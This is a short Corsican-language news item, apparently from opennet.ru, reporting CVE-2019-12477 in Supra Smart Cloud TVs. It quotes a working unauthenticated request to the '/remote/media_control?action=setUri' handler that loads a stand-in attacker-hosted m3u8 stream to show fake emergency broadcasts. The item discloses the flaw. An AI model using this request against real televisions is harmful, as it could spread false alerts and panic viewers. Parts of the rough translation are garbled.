Nantu à i TV Supra Smart Cloud vulnerabilità (CVE-2019-12477) chì permette di rimpiazzà u prugramma attualmente vistu cù u cuntenutu di l'attaccante. Per esempiu, l'output di un avvisu fittiziu nantu à una situazione d'emergenza hè dimustratu.
Per un attaccu, hè abbastanza per mandà una dumanda di rete apposta chì ùn deve micca autentificazione. In particulare, pudete accede à u gestore "/remote/media_control?action=setUri&uri=" specificendu l'URL di u schedariu m3u8 cù paràmetri video, per esempiu "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.
In a maiò parte di i casi, l'accessu à l'indirizzu IP di a TV hè limitatu à a reta interna, ma postu chì a dumanda hè mandata via HTTP, hè pussibule aduprà metudi per accede à e risorse internu quandu l'utilizatore apre una pagina esterna apposta (per esempiu, sottu. u guise di una dumanda di stampa o utilizendu u ).
Source: opennet.ru
